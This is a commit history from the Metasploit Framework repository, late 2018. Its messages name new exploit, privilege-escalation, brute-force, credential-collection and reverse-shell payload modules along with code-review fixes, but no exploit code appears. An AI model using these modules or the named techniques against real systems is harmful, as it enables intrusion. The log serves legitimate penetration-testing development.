Commit Graph

25770 Commits (53143d57afc27aec973fb930bea68a3e5542fbaa)

Author SHA1 Message Date
Brendan Coles 1eeb1005db
Update modules/auxiliary/admin/oracle/oracle_index_privesc.rb
Use print_error for errors and print the error details,

Co-Authored-By: moshekaplan <me@moshekaplan.com>
2018-11-30 09:39:57 -05:00
Julien Legras 6874dddc55 Fix space at EOL and sed replace 2018-11-30 15:26:14 +01:00
Julien Legras a4ee221333 Fixed the timeout for web requests 2018-11-30 14:47:41 +01:00
Jacob Robles 8047bf2b09
Add authenticating... message 2018-11-30 07:24:35 -06:00
Jacob Robles b31afb4e3d
Spaces at EOL fixes 2018-11-29 17:29:05 -06:00
Jacob Robles fcbc0cddba
Land #11035, improve fingerprinting for Cisco ASA VPN scanner 2018-11-29 16:41:22 -06:00
Jacob Robles dec08a0b43
Land #10954, apache spark unauth rce module 2018-11-29 13:56:21 -06:00
Jacob Robles 88ca775fd3
Land #10952, WP GDPR Compliance plugin exploit 2018-11-29 13:31:31 -06:00
Julien Legras 160015d3a7 Check the HTTP response first 2018-11-29 18:54:07 +01:00
Julien Legras 984354194f Check the HTTP response first 2018-11-29 18:49:41 +01:00
bwatters-r7 1304f93f1f
Add more checks and a cleanup function 2018-11-29 10:39:46 -06:00
Jacob Robles 01af176679
Change delay implementation 2018-11-29 10:05:47 -06:00
Jacob Robles ed6c2896e3
Remove duplicate check 2018-11-29 10:04:51 -06:00
Jacob Robles 8508824cc2
Modify check logic 2018-11-29 10:04:05 -06:00
Julien Legras 2b61c4e118 Fixes for PR 2018-11-29 15:02:03 +01:00
Thomas Gregory a4c3b8edc7 Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
2018-11-29 20:20:05 +07:00
Jacob Robles 3de07f1bff
Add Notes metadata and warning 2018-11-29 06:35:37 -06:00
Jacob Robles bfaa6cb416
Add module suggestion 2018-11-29 06:23:45 -06:00
epi 5058afb615 Fixed lport and scopeid offsets.
Offsets for scopeid and lport were incorrect in the previous commit.
Updated offsets to the correct values.  Confirmed by viewing the connect
syscall values with strace.
2018-11-29 05:42:54 -06:00
epi 947f5ffbf3 Add Linux x86_64 IPv6 Inline Reverse Shell
Implements inline x86_64 Linux reverse bourne shell over IPv6.
2018-11-28 21:58:12 -06:00
Green-m 4888ec0c29 Delete unused variable. 2018-11-29 10:48:25 +08:00
Jacob Robles 6845f44a2e
Logic... 2018-11-28 20:26:27 -06:00
Jacob Robles 2864c30965
Fix fail_with issue 2018-11-28 20:18:03 -06:00
Jacob Robles e142f5716e
Update documentation 2018-11-28 19:08:01 -06:00
Jacob Robles 1af7cf2b3b
Update print statements 2018-11-28 18:03:55 -06:00
Jacob Robles c4959da77f
Email validation and user registration 2018-11-28 17:56:55 -06:00
Jacob Robles 9c0c9b3ba9
Use warnings when changing config options 2018-11-28 17:44:02 -06:00
Jacob Robles 43cef24f6b
Fix version check 2018-11-28 17:43:33 -06:00
Brent Cook bff261616c improve fingerprinting for Cisco ASA VPN scanner 2018-11-28 14:30:17 -06:00
asoto-r7 504237c77a
Land #10877, ibm-mq-login username/password checker 2018-11-28 11:36:53 -06:00
asoto-r7 84f0a59fe6
ibm_mq_login: Added support for WebSphere 9 via the PASSWORD option 2018-11-28 11:08:37 -06:00
Green-m ca0a2684f5
Randomize payload main class. 2018-11-28 11:26:51 +08:00
Brent Cook b3ad4a0358
Land #11033, update refs for imap_open vulnerability 2018-11-27 20:23:46 -06:00
h00die e3e7285288
Land #9946 a UEB local priv escalation 2018-11-27 21:19:34 -05:00
h00die 38a99ac90a ueb privesc updates 2018-11-27 21:18:05 -05:00
h00die 4af5ab3089 ueb privesc updates 2018-11-27 21:14:05 -05:00
h00die 63125bbc1a update imap_open refs 2018-11-27 20:31:57 -05:00
Wei Chen d6db5ebdfe
Land #10716, Create PureVPN Credential Collector Post Explotation Module 2018-11-27 17:42:23 -06:00
Brendan Coles 180876d8fc Add check for SMAP 2018-11-27 23:24:02 +00:00
bwatters-r7 503a544c17 Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master 2018-11-27 16:57:39 -06:00
Brent Cook b05bb616bf
Land #10987, add exploit for PHP imap_open function against various web apps 2018-11-27 16:44:51 -06:00
Wei Chen 830a80e598 Check -1 user/pass condition and improved exception handling 2018-11-27 16:23:09 -06:00
Brent Cook 66cae6240f
Land #10994, Added exploit for CVE-2018-18955 2018-11-27 16:12:05 -06:00
Shelby Pace 6712363bb5
Land #10737, add TeamCity XML-RPC exploit module 2018-11-27 14:59:37 -06:00
Shelby Pace 56f14733a9
changed cmd_stager flavor to printf 2018-11-27 14:23:56 -06:00
Wei Chen d523124faf
Land #10965, Add the macOS LPE from pwn2own2018 (CVE-2018-4237) 2018-11-27 14:00:35 -06:00
Brendan Coles 398987e94a ::File.binread 2018-11-27 18:58:05 +00:00
Brendan Coles 45ca248568 chmod 2018-11-27 18:39:03 +00:00
Brendan Coles aae86241ef Update version check 2018-11-27 18:13:29 +00:00
William Vu befca0f2fe
Land #10949, ForceExploit for Linux local exploits 2018-11-27 11:23:03 -06:00
Wei Chen 1f2827c3d0
Land #10975, More Capture Docs 2018-11-26 13:51:57 -06:00
Brent Cook 0fddb8e31c
Land #10768, Exploit for Netgear CVE-2016-1555 2018-11-26 11:45:10 -06:00
bwatters-r7 14b2cdc120
Land #10886, Bypassuac computerdefault
Merge branch 'land-10886' into upstream-master
2018-11-26 11:19:46 -06:00
Brent Cook 0b6c73a7d4
Land #11019, Replace WsfDelay with WfsDelay 2018-11-26 10:59:04 -06:00
Brent Cook 7b4b573942
Land #9915, Cleanup and improvements to influxdb_enum 2018-11-26 10:25:07 -06:00
h00die e2d58afe13 cleaned up code, added custom 2018-11-25 10:59:53 -05:00
Brendan Coles 5c06cdca73 Replace WsfDelay with WfsDelay - Fixes #11018 2018-11-25 05:09:16 +00:00
Brendan Coles be6cfde921
Land #11015, Fix payload and console check for Xorg_privesc Linux targets 2018-11-25 04:51:27 +00:00
Aaron Ringo 93db7b399f Using Wfsdelay instead of sleep loop, users get shells ASAP 2018-11-24 22:26:04 -06:00
Brendan Coles debf79416b Replace WsfDelay with WfsDelay - Fixes #11018 2018-11-25 04:22:11 +00:00
Brendan Coles 01ed57cbb3 Remove check for nosuid 2018-11-25 01:53:07 +00:00
Brendan Coles ff23a006b7 cleanup 2018-11-25 00:16:39 +00:00
Aaron Ringo 1783617770 consolelock check updated to use id, payload upload changed, documentation updated, misc formatting 2018-11-24 15:10:21 -06:00
h00die 945755b058 add custom php_imap target 2018-11-24 14:18:13 -05:00
h00die 45f2c5beb2 update php_imap_open docs 2018-11-24 07:26:42 -05:00
h00die e36cef3b96 e107 exploitable now 2018-11-23 20:16:53 -05:00
L f4cbdc8e3e No Threads in datastore 2018-11-23 17:15:33 +08:00
William Vu 8a402da056 Explain "junk" in buffer for morris_fingerd_bof
And unrelated whitespace changes because I suck.
2018-11-22 23:15:12 -06:00
Moshe Kaplan 0a2c0751fa
Randomize more 2018-11-22 15:25:51 -05:00
Brent Cook a59913434d
Land #10916, Xorg SUID privesc 2018-11-21 19:46:11 -06:00
Brent Cook 5d9195fe72
Land #10981, start printjob docs and bug fixes 2018-11-21 16:35:02 -06:00
Brent Cook 5fed559264
Land #10997, Remove harmful default command to execute 2018-11-21 16:19:40 -06:00
asoto-r7 96ede80dc4
Land #10876, ibm_mq_enum: IBM WebSphere MQ Name and Version Enumeration 2018-11-21 16:10:59 -06:00
asoto-r7 a3131f15de
ibm_mq_enum: Code cleanup, server channel and general exception handling improvements 2018-11-21 16:09:18 -06:00
Adam Cammack 188d94027c
Land #10996, Check `check` code for ms15-034 2018-11-21 14:45:56 -06:00
David Yates e706e2b58d
Remove harmful default command to execute 2018-11-21 11:09:13 +02:00
L ae3538952a Fix ms15-034 module 2018-11-21 12:31:56 +08:00
Green-m 2197da4cd9
Fix code as jrobles suggest. 2018-11-21 11:24:50 +08:00
h00die acf421ffb0 remove eol spaces 2018-11-20 19:45:17 -05:00
h00die 31ad58fb91 edb and author 2018-11-20 19:30:43 -05:00
h00die 4111a61e1a fix module description 2018-11-20 18:35:20 -05:00
h00die 4c59a271e2 added suitecrm to imap_open exploit 2018-11-20 18:33:42 -05:00
asoto-r7 7084538b8c
ibm_mq_channel_brute: Exception handling when channel.length > 20 chars 2018-11-20 16:24:17 -06:00
asoto-r7 d2a5b966f3
Land #10875, IBM WebSphere MQ Channel Name Bruteforce auxiliary module 2018-11-20 16:23:23 -06:00
Shelby Pace 288d78d372
Land #10352, Add check/response for CVE-2017-12149 2018-11-20 13:11:05 -06:00
Brent Cook d5d8216377
Land #10977, Add documentation and some enhancement to freesshd_authbypass module 2018-11-20 11:44:49 -06:00
Brent Cook bccb0972cf
Land #10984, don't examine a nil object in ms15_034_ulonglongadd 2018-11-20 08:37:48 -06:00
Shelby Pace 63a2396626 updated testing branch to branch off master 2018-11-20 08:14:19 -06:00
Brendan Coles eb17c45000 Add Linux Nested User Namespace idmap Limit Local Privilege Escalation module 2018-11-20 14:10:28 +00:00
Brendan Coles 901b51f247
Update modules/auxiliary/scanner/http/iis_shortname_scanner.rb
Co-Authored-By: egre55 <34132245+egre55@users.noreply.github.com>
2018-11-20 11:13:17 +00:00
Brendan Coles 6c382ba711
Update modules/auxiliary/scanner/http/iis_shortname_scanner.rb
Co-Authored-By: egre55 <34132245+egre55@users.noreply.github.com>
2018-11-20 11:13:05 +00:00
Brendan Coles 5e513b209d
Update modules/auxiliary/scanner/http/iis_shortname_scanner.rb
Co-Authored-By: egre55 <34132245+egre55@users.noreply.github.com>
2018-11-20 11:12:51 +00:00
Tim W 3829cc11bb add DEBUG_EXPLOIT option 2018-11-20 17:58:36 +08:00
Tim W 57bad6b213 move offsets to hash
fix
2018-11-20 17:58:34 +08:00
Green-m 9884bea84e
Update the reference link. 2018-11-20 17:39:01 +08:00
Green-m 9f573d6f27
Fix code as jrobles suggest. 2018-11-20 16:54:22 +08:00
Tim W bee3c3d4d3 add documentation 2018-11-20 16:53:34 +08:00
Tim W 44b1b6fe31 fix forking 2018-11-20 15:58:55 +08:00
Shelby Pace 52df29ebcc test on branch off master 2018-11-19 15:08:38 -06:00
Brent Cook 509e1c2587
Land #10973, Rework DisclosureDate check in msftidy, including ISO 8601 support 2018-11-19 10:46:18 -06:00
h00die a28feed7d8 fix normalize and date 2018-11-19 04:00:58 -05:00
Shaksham Jaiswal d904b93ec9
fixed is_vul 2018-11-19 13:39:08 +05:30
h00die 4b09584047 php_imap_open_rce 2018-11-18 21:28:19 -05:00
egre55 4a22656005 fixes 2018-11-18 21:56:51 +00:00
egre55 8b63c85bd2 fixes 2018-11-18 21:21:28 +00:00
Brendan Coles 467e0877f5 res.code 2018-11-18 12:40:09 +00:00
h00die 7ecdaa09c5 start printjob docs and bug fixes 2018-11-17 21:17:12 -05:00
Imran E. Dawoodjee b679bfa3d9
Carriage return errors fixed. 2018-11-18 03:29:17 +08:00
Imran E. Dawoodjee fd0f40a141
Add PowerShell as a separate target then set it as default. 2018-11-18 03:20:48 +08:00
Carsten Maartmann-Moe cbdcd367ee Minor print out mod 2018-11-16 20:31:34 +01:00
christopher lee 2deaf198b3 Added module docs 2018-11-16 13:29:22 -06:00
Brendan Coles 6f094799b6
Update modules/exploits/windows/http/hp_imc_java_deserialize.rb
Print payload length

Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-16 20:20:52 +01:00
Brendan Coles 709befea5c
Update modules/exploits/windows/http/hp_imc_java_deserialize.rb
Fixed if/else block return

Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-16 20:19:23 +01:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
2018-11-16 12:18:28 -06:00
Imran E. Dawoodjee 08b3efa046
Enhanced module and added documentation. 2018-11-16 21:18:45 +08:00
Aaron Ringo a174c606aa Changed SELINUX check to use built in methods 2018-11-16 04:22:18 -06:00
h00die 189f29e534
Land #10572 eaton ssh private key scanner 2018-11-15 17:16:36 -05:00
h00die de014f0599 remove variable only used once 2018-11-15 17:14:13 -05:00
h00die 8b4cf2c3e2 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into capture_docs2 2018-11-15 17:02:50 -05:00
h00die 3d53170694 fail_with instead of error and return 2018-11-15 17:01:52 -05:00
Carsten Maartmann-Moe 680393d4d6 Refined check method to actually verify vulnerability 2018-11-15 22:31:31 +01:00
Tim W 420be60900 add CVE-2018-4237 2018-11-15 08:48:10 +08:00
Tim W 2c30459a1b add CVE-2018-4233 and CVE-2018-4404 2018-11-15 08:44:18 +08:00
Christopher Lee 38bea6c29c Added msmailprobe to msf 2018-11-14 16:15:11 -06:00
Chris Higgins 4987f67b9b
Land #10925, smb_login error/status message 2018-11-14 13:19:04 -06:00
Jacob Robles 795aa3c99c
Land #10828, git submodule url exec CVE-2018-17456 2018-11-14 12:39:13 -06:00
Julien Legras 02f2a2828e Fix references CVE and WPVDB 2018-11-14 18:19:12 +01:00
Julien Legras 3daec992c8 Fix indentation 2018-11-14 18:08:31 +01:00
Jacob Robles 798d3156bc
Print git command for module 2018-11-14 10:57:36 -06:00
Julien Legras b9348bd579 Added the CVE number in the references 2018-11-14 16:52:57 +01:00
Julien Legras 5f9570cbcf Added WordPress Duplicator <= 1.2.40 and documentation 2018-11-14 16:39:42 +01:00
Green-m f43aaac290
Clean code. 2018-11-14 16:48:39 +08:00
Aaron Ringo 4fc047db87 Added advanced option to check console lock on linux systems, default true & updated docs 2018-11-13 22:33:12 -06:00
Green-m 7cc4d09a92
Clean code. 2018-11-14 10:35:38 +08:00
Shelby Pace 5e85683228
removed to_s from string 2018-11-13 15:28:55 -06:00
BrianWGray 3849d5de18 resolve description update request 2018-11-13 16:21:43 -05:00
Shelby Pace ac8932c144 update 9631 to a current branch 2018-11-13 15:15:25 -06:00
Alex Gonzalez da134f06e3
Updated check method
Fixed check method and redundant variable declarations
2018-11-13 16:01:40 -05:00
Brent Cook f2712ecdf6
Land #10607, Add External Module: office365userenum.py 2018-11-13 10:57:05 -06:00
Green-m 7a4770790c
Land #10938, add docs for modules and fix bug.
Add docs for auxiliary module http_basic/imap/mysql, and fix a bug
in modules/auxiliary/server/capture/mysql.rb
2018-11-13 16:22:03 +08:00
thomas.labadie 11a2fa7f0d Space at EOL removed from description 2018-11-13 00:23:21 +01:00
thomas.labadie 9d1554498d WP GDPR Compliance plugin exploit - privsec to admin registering 2018-11-12 23:33:47 +01:00
Aaron Ringo 538055c406 Initial documentation for Xorg Privesc Module
killed white spaces
2018-11-12 15:44:13 -06:00
Carsten Maartmann-Moe 541283a4dd Tidied up set_payload 2018-11-12 20:45:49 +01:00
Brendan Coles 0bdab320f7
Remove useless variable declaration
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-12 12:04:22 +01:00
Green-m 388aebc335
Add exploit module for spark unauthenticated rce. 2018-11-12 17:07:50 +08:00
Imran E. Dawoodjee 16d146fd59
Fixing indentation. 2018-11-12 13:24:00 +08:00
Imran E. Dawoodjee 3e4df06500
Some more modifications
Placed contents of request_post into execute_command
Randomized fingerprint with rand_text_alpha(12)
Spaces at EOL fixed
Normalized target URI
2018-11-12 13:04:42 +08:00
Imran E. Dawoodjee 818cb37aca
Implemented changes recommended by @bcoles. 2018-11-12 12:26:23 +08:00
Carsten Maartmann-Moe e06af184c8 Tidy check method 2018-11-11 22:53:13 +01:00
Carsten Maartmann-Moe 8894af58de serialized, not deserialized... 2018-11-11 22:47:57 +01:00
Carsten Maartmann-Moe 1e8fbc3a1b Fixed indentation and added a status message printout when exploiting 2018-11-11 22:37:42 +01:00
Carsten Maartmann-Moe cf5ca78350 Added YSOSerial payload generating string 2018-11-11 22:15:30 +01:00
Aaron Ringo ef7fc783be Added Selinux check, changed version check, retested on all platforms 2018-11-11 12:34:30 -06:00
Brendan Coles a5429d21a6
Update modules/exploits/multi/local/xorg_x11_suid_server.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2018-11-11 07:39:32 -06:00
Brendan Coles 2a7b18bcbf
Update modules/exploits/multi/local/xorg_x11_suid_server.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2018-11-11 07:38:42 -06:00
Brendan Coles 40bc44d2b6 Add ForceExploit to Linux local modules 2018-11-11 09:37:56 +00:00
Aaron Ringo e6f548c5f4 added meterpreter, took out in session, moved to exploits/multi/local 2018-11-11 01:43:36 -06:00
Brendan Coles 3770f121fe
Changing result parsing style
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-11 08:07:37 +01:00
Brendan Coles 951d3e1117
Changing result parsing style
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-11 08:07:32 +01:00
Brendan Coles 446eec00b3
Remove disconnect
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-11 08:04:43 +01:00
Brendan Coles 189c203e3d
Remove handler
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-11 08:04:34 +01:00
Brendan Coles e5df5494d9
Remove connect
Co-Authored-By: carmaa <carsten@carmaa.com>
2018-11-11 08:04:22 +01:00
Carsten Maartmann-Moe 5a978dca2e Removed architecture to make payload selection work 2018-11-10 23:00:54 +01:00
Carsten Maartmann-Moe cbaacf696a Add exploit module for CVE-2017-12557
HP Intelligent Management Java Deserialization RCE (Windows)
2018-11-10 22:36:43 +01:00
BrianWGray 1c2da8a5c8 correct trailing space issue 2018-11-10 15:40:03 -05:00
BrianWGray 33f624bbb2 Module updated to reflect requested changes 2018-11-10 14:36:06 -05:00
Brendan Coles 1f14a9846d
Land #10767, Add Cisco Prime Infrastructure remote root exploit 2018-11-10 17:08:16 +00:00
h00die bf15fa0770 hash not password for mysql 2018-11-09 18:32:21 -05:00
h00die c31c75c790 fix mysql capture store creds 2018-11-09 18:18:50 -05:00
Green-m 981893a8bf
Merge branch 'master' into sparkrce 2018-11-09 14:12:33 +08:00
Aaron Ringo b93f14a5c2 Fixed some PR feedback, still working on adding meterpreter and cleanup 2018-11-08 22:10:46 -06:00
Aaron Ringo 3f3bee6a79 added version check 2018-11-08 22:08:11 -06:00
Aaron Ringo 012c8a450f Feedback from PR work cont. changed loop, formatting errors, options 2018-11-08 22:08:11 -06:00
Aaron Ringo adb8be7f9f includes partially implemented feedback from PR 2018-11-08 22:08:11 -06:00
Brendan Coles 18bf58e547 Update modules/exploits/openbsd/local/xorg_x11_suid_server.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2018-11-08 22:08:11 -06:00
Brendan Coles 8c4eb5f741 Update modules/exploits/openbsd/local/xorg_x11_suid_server.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2018-11-08 22:08:11 -06:00
Brendan Coles 84b79e6787 Update modules/exploits/openbsd/local/xorg_x11_suid_server.rb
Co-Authored-By: aringo <ringo.aaron@gmail.com>
2018-11-08 22:08:11 -06:00
Aaron Ringo 7feb960d9b Initial add of Xorg SUID privesc 2018-11-08 22:08:11 -06:00
h00die 792b451f40 capture server docs and updates 2018-11-08 21:23:27 -05:00
root f192b50a8e Catch exceptions 2018-11-08 18:47:56 +00:00
root 1fbf779f9c Added more verbose output 2018-11-08 18:35:15 +00:00
root 88e4d384d2 increased default timeout value 2018-11-08 16:13:55 +00:00
h00die 3c6f2157ae
land #10895 fix vmware_http_login undefined variables 2018-11-07 08:45:51 -05:00
Aaron Ringo 9dd0f2a5ea modified to allow unix cmd for testing and other targets not supported, took out interpolation,notes section re-added
added notes section back in
2018-11-06 20:45:20 -06:00
Jacob Robles 682433f62e
smb_login error/status message 2018-11-05 17:49:58 -06:00
Jeffrey Martin dd57b27652
Rename `hash` to `generate_process_hash`
In the interest of compatibility this uses a more descriptive name for
the process hash creation method instead of overriding ruby's hash method.
See https://docs.ruby-lang.org/en/2.0.0/Hash.html
2018-11-05 17:16:16 -06:00
h00die aff4ef0752
land #10912 moving polycom exploit to misc folder 2018-11-05 16:54:24 -05:00
Shelby Pace 0c38babb9e
Land #10874, rm size restriction from pyld_inject 2018-11-05 15:16:40 -06:00
bwatters-r7 f185c06204
Land 10794, Add support for ms17_010_eternalblue_win8 ProcessName option
Merge branch 'land-10794' into upstream-master
2018-11-05 15:08:59 -06:00
bwatters-r7 7ca2311325
Land #10792, Add support for ms17_010_eternalblue ProcessName option
Merge branch 'land-10792' into upstream-master
2018-11-05 14:19:10 -06:00
bwatters-r7 1f0941101f
shut up, msftidy 2018-11-05 14:13:33 -06:00
bwatters-r7 4f2ba46125
Stop some of the rubocop carnage 2018-11-05 14:11:24 -06:00
Wei Chen a32d8083f0
Land #10847 - Add blueimp's jQuery (Arbitrary) File Upload
CVE-2018-9206
2018-11-05 11:37:20 -06:00
Brent Cook cb229411bc
Land #10888, Fix Net::SSH::CommandStream session open failure 2018-11-05 11:15:09 -06:00
bwatters-r7 5ec155fd44
Changed some options to advanced 2018-11-05 09:59:17 -06:00
Green-m 708d067e65
Land #10919, Add doc for ftp capture module.
And add a custom option banner for it.
2018-11-05 14:15:52 +08:00
l9c ff07289132 better style according to the review 2018-11-05 13:46:36 +08:00
h00die 04218cff39 ftp capture 2018-11-04 21:46:01 -05:00
Pedro Ribeiro 7464d81c01
Add warning about JSP deletion 2018-11-05 00:52:34 +09:00
Shaksham Jaiswal e3246a9b88
made fixes 2018-11-04 18:07:43 +05:30
Brendan Coles fdf45f269b Move polycom_hdx_auth_bypass to exploit/unix/misc/ 2018-11-04 06:14:26 +00:00
Brendan Coles c3080d69f2 Use writable? method for local modules 2018-11-04 05:28:32 +00:00
bwatters-r7 4ac9fe5c9f
Land #10834, For real this time
Merge branch 'land-10834' into upstream-master
2018-11-02 14:35:00 -05:00
bwatters-r7 15cc699071
Land #10834, messagebox payload for x64
Merge branch 'land-10834' into upstream-master
2018-11-02 14:17:59 -05:00
Jacob Robles 6bc4b71ca3
Land #10873, Add notes to exploit modules 2018-11-02 14:11:11 -05:00
Spencer McIntyre 7faa775b55 Remove the now unnecessary DisableNops option 2018-11-02 14:57:41 -04:00
Jacob Robles 2d3403cdd2
Land #10901, Add modules for iOS images and texts 2018-11-02 13:46:58 -05:00
Brent Cook 86469cc5a0
Land #10836, Add Morris worm sendmail debug mode exploit 2018-11-02 11:17:33 -05:00
Brent Cook 1d81f3764f
Land #10700, Add Morris worm fingerd exploit and VAX reverse shell 2018-11-02 11:16:46 -05:00
pasta 6752bdd536 space's purge 2018-11-02 11:27:53 -03:00
Shelby Pace 0d8c8da470
remove useless method wrappers, fix indentation 2018-11-02 08:01:15 -05:00
William Vu e9b3502f98 Fix Net::SSH::CommandStream session open failure
I suspected this might be a problem for libssh servers.
2018-11-02 01:08:05 -05:00
Shelby Pace 4a8c1ef8f4
changed where pwd was getting executed 2018-11-01 16:06:08 -05:00
Shelby Pace a1abebedd1
changed location of some code 2018-11-01 15:29:53 -05:00
Shelby Pace 2a2b1a47cc
updated block size, title 2018-11-01 15:00:38 -05:00
Brendan Coles a80e571355 Update style 2018-11-01 07:26:12 +00:00
Brendan Coles ca16e93200 rescue => e 2018-11-01 07:24:28 +00:00
Brendan Coles ffecd189ee Report rhost, as ip is undefined 2018-11-01 07:23:44 +00:00
bwatters-r7 114a8127e8
Land #10858, bypassuac_eventvwr optimizations - reduce created processes and artifacts
Merge branch 'land-10858' into upstream-master
2018-10-31 16:44:32 -05:00
bwatters-r7 af7a7d586b
Add validation check to make sure x64 remote host and a x86 session
cannot select an x64 target.
2018-10-31 16:31:52 -05:00
Shelby Pace 7e61ec53da
downloading images by modifying block size 2018-10-31 14:36:45 -05:00
pasta a7bb211c20 add OptEnum to filter icon type 2018-10-30 20:30:49 -03:00
pasta 3fb047c0f1 29 rubocop's issues fixed 2018-10-30 19:47:28 -03:00
Shelby Pace b57b269df4
storing images 2018-10-30 15:43:25 -05:00
pasta c8740a1b0f deleted spaces at EOL 2018-10-30 15:09:39 -03:00
bwatters-r7 08ec8e1ef9
Land #10553, add x86/xor_dynamic and x64/xor_dynamic encoders
Merge branch 'land-10553' into upstream-master
2018-10-30 09:56:15 -05:00
Fabien 0cf8563fae
Update bypassuac_computerDefault.rb 2018-10-30 11:37:05 +01:00
Fabien bf295ecce5
Update bypassuac_computerDefault.rb 2018-10-30 11:36:38 +01:00
Luisco100 7f26364d5b Changes suggested by OJ 2018-10-29 22:01:47 -05:00
Shelby Pace d1da7d84db
added metadata and main function 2018-10-29 15:26:26 -05:00
pasta 4960e1b8c8 modification to accomplish the guideline and license changed to GPL 2018-10-29 14:11:21 -03:00
Elazar Broad 6fe7bb0bb6
Increase sleep time to 10 seconds
Increase the wait time before removing the registry key - allows the payload to spawn successfully on slow systems.
2018-10-29 12:55:03 -04:00
Quentin Kaiser 1d337e9987 No debug. 2018-10-29 13:46:07 +01:00
Quentin Kaiser e76f3ab22f No debug. 2018-10-29 13:44:16 +01:00
root b705059bca Added channel name length check 2018-10-28 20:18:58 +00:00
root 60aa1181ca Add IBM WebSphere MQ Login Bruteforce module
Used to bruteforce usernames that can connect to the Queue Manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
  * Download and install MQ Server from the above link
  * Create a new Queue Manager
  * Create a new channel (without SSL)
  * Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
  * Run the module
2018-10-28 19:29:45 +00:00
pkb1s 92d5ab469c
Update ibm_mq_channel_brute.rb 2018-10-28 18:21:54 +00:00
Brendan Coles 1c340f8202
Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit 2018-10-28 18:17:46 +00:00
Brendan Coles 296d9a08eb
Removing unnecessary line
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:51 +00:00
Brendan Coles 3e3be18189
Using print_line instead of print("\n")
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:14 +00:00
Brendan Coles f8c829dc81
Using print_line instead of print("\n")
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:10:09 +00:00
Brendan Coles 67e8a7ce13
Changing CHANNELS_FILE option type
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:08:12 +00:00
Brendan Coles f51a95465e
Changed http to https in metasploit url
Co-Authored-By: pkb1s <petkoutroubis@gmail.com>
2018-10-28 18:07:20 +00:00
pkb1s a6135e3738
Added "increase timeout" message 2018-10-28 17:48:15 +00:00
root 02d9d0f006 Add IBM WebSphere MQ Queue Manager Name and MQ Version Enumeration module
Run this auxiliary against the listening port of an IBM MQ Queue Manager to identify its name and version. Any channel type can be used to get this information as long as the name of the channel is valid.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
  * Download and install MQ Server from the above link
  * Create a new Queue Manager
  * Create a new channel (without SSL)
  * Run the module
2018-10-28 16:09:17 +00:00
root a23cb7dfe8 Add IBM WebSphere MQ Channel Name Bruteforce module
Uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.

* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
* Tested on IBM MQ 7.5, 8 and 9
* Usage:
** Download and install MQ Server
** Create a Queue Manager
** Create a new channel (without SSL)
** Run the module
2018-10-28 15:22:27 +00:00
kr3bz 370bcaf8d8
Update mercury_login.md 2018-10-28 09:49:15 +01:00
Brendan Coles a34310095c
Update modules/exploits/windows/imap/mercury_login.md
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
2018-10-28 09:41:29 +01:00
Brendan Coles bfd3a17c0e
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
2018-10-28 09:41:14 +01:00
kr3bz 5efbefdaea
Update mercury_login.md 2018-10-28 09:37:47 +01:00
kr3bz 2839a73cbd
Update mercury_login.rb 2018-10-28 09:35:15 +01:00
Spencer McIntyre 52fee303d4 Remove the size restriction from payload_inject 2018-10-27 21:26:09 -04:00
Spencer McIntyre caf76a6555 Add applicable notes to my exploit modules 2018-10-27 20:54:14 -04:00
kr3bz c61737bb18
Update mercury_login.md 2018-10-27 20:52:54 +02:00
kr3bz 239632ca03
Update mercury_login.md 2018-10-27 20:52:24 +02:00
kr3bz 3cf8a01b55
Update mercury_login.md 2018-10-27 20:51:31 +02:00
Brendan Coles 965c2d5c01
Update modules/exploits/windows/imap/mercury_login.rb
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
2018-10-26 13:37:37 +02:00
bwatters-r7 b4c005c4d4
Land #10561, Add Windows local privilege escalation - CVE-2018-0824
Merge branch 'land-10561' into upstream-master
2018-10-25 13:22:31 -05:00
Fabien 6b4e132f35
Create bypassuac_computerDefault.rb 2018-10-25 16:58:56 +02:00
Fabien 280a714faf
Delete bypassuac_computerDefault.rb 2018-10-25 16:58:34 +02:00
William Vu e1a7c35834 Clean up check_banner 2018-10-25 05:20:20 -05:00
Green-m f90992dc08
